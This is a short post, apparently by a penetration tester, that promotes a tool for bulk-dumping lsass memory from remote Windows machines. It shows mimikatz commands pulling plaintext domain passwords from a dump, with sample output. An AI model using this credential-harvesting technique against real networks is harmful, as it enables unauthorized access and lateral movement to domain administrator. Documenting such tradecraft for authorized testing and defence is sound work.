Recently, I was quite successful with using the procdump technique of dumping lsass, retrieving the dumpfile and, processing it offline to find credentials on a compromised machine.
When I used this during an engagement, this ultimately led me to obtaining DA. So ever since then, I find this very useful.
I've created a python tool to automate this. Either run this against a single target, or from a list of IPs/hostnames.
This will upload procdump, dump lsass and download the dumpfile.
Check it out here:
https://github.com/n33dle/humptydumpty/
The idea here is once you have some authenticated access in a domain. Say, local administrator on all workstations, this tool will allow you to quickly obtain lsass dumps from a list of remote machines.
I stress, dumping lsass could result in a BSOD, so take care when flying this across a network!
As a result, running each of the dump files in mimikatz could provide you with additional credentials within the network.
For example:
mimikatz # sekurlsa::Minidump humpty-10.1.1.5.dmp
Switch to MINIDUMP : 'humpty-10.1.1.5.dmp'
mimikatz # sekurlsa::logonPasswords full
Opening : 'humpty-10.1.1.5.dmp' file for minidump...
<snip>
wdigest :
* Username : victim3
* Domain : vulnerable
* Password : NonHackable
<snip>
* Username : victim2
* Domain : vulnerable
* Password : TheEarthIsRound!
<snip>
* Username : victim
* Domain : vulnerable
* Password : TheEarthIsFlat!
<snip>
